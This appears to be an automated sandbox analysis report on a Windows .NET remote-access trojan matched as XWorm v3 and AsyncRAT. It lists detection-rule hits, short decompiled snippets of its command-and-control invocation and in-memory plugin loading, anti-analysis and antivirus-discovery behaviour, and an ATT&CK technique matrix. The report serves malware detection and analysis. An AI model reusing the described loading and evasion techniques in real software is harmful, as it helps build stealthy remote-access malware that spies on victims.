            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, type: SAMPLEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000000.840308538.00000000005D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeMutant created: NULL
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeMutant created: \Sessions\1\BaseNamedObjects\FNajPvJhcrtOPazO
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeVirustotal: Detection: 75%
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeReversingLabs: Detection: 86%
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, Messages.cs.Net Code: Memory
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeCode function: 0_2_00007FF936861789 push ebx; retf 0_2_00007FF93686178A
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeMemory allocated: D00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeMemory allocated: 1A9C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeWindow / User API: threadDelayed 4894Jump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeWindow / User API: threadDelayed 4938Jump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe TID: 6476Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe TID: 6380Thread sleep count: 4894 > 30Jump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe TID: 6380Thread sleep count: 4938 > 30Jump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3290293188.000000001B860000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW %SystemRoot%\system32\mswsock.dll <add name="AspNetSqlRoleProvider" connectionStringName="LocalSqlServer" applicationName="/"
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeMemory allocated: page read and write | page guardJump to behavior
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3288796136.0000000002D74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3288796136.0000000002D74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3288796136.0000000002D74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3288796136.0000000002D74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3288796136.0000000002D74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeQueries volume information: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3290293188.000000001B887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.840308538.00000000005D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.3288796136.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe PID: 6920, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.840308538.00000000005D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.3288796136.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe PID: 6920, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Process Injection
            1
            Disable or Modify Tools
            1
            Input Capture
            121
            Security Software Discovery
            Remote Services1
            Input Capture
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            131
            Virtualization/Sandbox Evasion
            LSASS Memory2
            Process Discovery
            Remote Desktop Protocol11
            Archive Collected Data
            1
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Process Injection
            Security Account Manager131
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture21
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information
            LSA Secrets13
            System Information Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Software Packing
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
